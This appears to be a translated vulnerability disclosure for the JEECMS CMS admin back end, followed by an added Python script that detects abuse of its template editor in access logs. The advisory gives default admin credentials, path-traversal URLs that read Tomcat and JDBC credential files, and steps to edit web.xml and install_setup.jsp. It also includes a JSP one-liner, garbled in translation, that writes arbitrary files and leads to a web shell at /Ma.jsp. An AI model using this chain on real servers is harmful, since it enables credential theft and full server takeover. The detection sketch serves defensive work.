JEECMS admin back end arbitrary file editing vulnerability, and security issues on the official demo site and official server
Detailed description:
2.x admin back end:
Login/Jeecms.do
3.x admin back end:
Jeeadmin/jeecms/index.do
Default Account: admin
Default password: password
Read the Tomcat password:
/Jeeadmin/jeecms/template/v_edit.do?Root=../conf/&name=../conf/tomcat-users.xml
Read the JDBC database account and password:
/Jeeadmin/jeecms/template/v_edit.do?Root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties
JEECMS 2.x read path:
Admin/core/template/Com_edit.do?RelPath=\.../../classes/jdbc.properties
Modify web.xml to remove the JSP filtering:
/Jeeadmin/jeecms/template/v_edit.do?Root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml
JEECMS 2.x read path:
Admin/core/template/Com_edit.do?RelPath=\.../../web.xml
Modify install/install_setup.jsp:
/Jeeadmin/jeecms/template/v_edit.do?Root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp
JEECMS 2.x read path:
Admin/core/template/Com_edit.do?RelPath=\.../install\install_setup.jsp
Insert a one-line JSP snippet:
<%
If (request. getParameter ("f ")! = Null) (new java. io. FileOutputStream (application. getRealPath ("\") + request. getParameter
("F"). write (request. getParameter ("t"). getBytes ());
%>
Path of the modified file containing the one-liner:
/Install/install_setup.jsp
Path of the JSP trojan written after a successful connection to the one-liner:
/Ma.jsp
Proof of vulnerability:
Solution: fix the official server first, you know.
Author: sneaked into the night @ wooyun
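Abuse of the template editor described above is visible in web server access logs. The following detection sketch is an added example, not part of the original advisory or of JEECMS: it flags requests to the two editor endpoints whose Root, name or RelPath parameters contain directory traversal or name the files the advisory reads or edits. The log lines are constructed samples, and treating any .jsp target as suspicious rests on the assumption that legitimate templates are never JSP files.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Template-editor endpoints named in the advisory (compared case-insensitively).
EDIT_ENDPOINTS = ("/template/v_edit.do", "/template/com_edit.do")
PATH_PARAMS = {"root", "name", "relpath"}
# Files the advisory reads or edits; ".jsp" assumes templates are never JSP files.
SENSITIVE = ("tomcat-users.xml", "jdbc.properties", "web.xml", ".jsp")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalise(value):
    """Undo double URL encoding and unify path separators."""
    return unquote(unquote(value)).replace("\\", "/").lower()

def suspicious_reasons(url):
    """Return why a request URL looks like template-editor abuse ([] if it does not)."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(EDIT_ENDPOINTS):
        return []
    reasons = []
    for key, raw in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() not in PATH_PARAMS:
            continue
        value = normalise(raw)
        if "../" in value or value.endswith(".."):
            reasons.append(f"{key}: directory traversal")
        reasons += [f"{key}: references {m}" for m in SENSITIVE if m in value]
    return reasons

def scan(lines):
    """Return (line number, client address, reasons) for each flagged access-log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        reasons = suspicious_reasons(match.group(1)) if match else []
        if reasons:
            hits.append((number, line.split()[0], reasons))
    return hits

# Constructed sample log lines (documentation addresses, made-up sizes and paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /Jeeadmin/jeecms/template/v_edit.do?Root=%2Ft%2F&name=%2Ft%2Findex.html HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:05:11 +0000] "GET /Jeeadmin/jeecms/template/v_edit.do?Root=../conf/&name=../conf/tomcat-users.xml HTTP/1.1" 200 900',
    '203.0.113.9 - - [01/Jan/2024:10:05:40 +0000] "GET /Jeeadmin/jeecms/template/v_edit.do?Root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties HTTP/1.1" 200 700',
    '203.0.113.9 - - [01/Jan/2024:10:06:02 +0000] "GET /Admin/core/template/Com_edit.do?RelPath=%5C...%2F..%2Fweb.xml HTTP/1.1" 200 800',
]
```

Calling `scan(SAMPLE_LOG)` flags the second, third and fourth lines and leaves the ordinary template edit alone; parameters sent in a POST body do not appear in access logs and need request-body logging or a WAF rule instead.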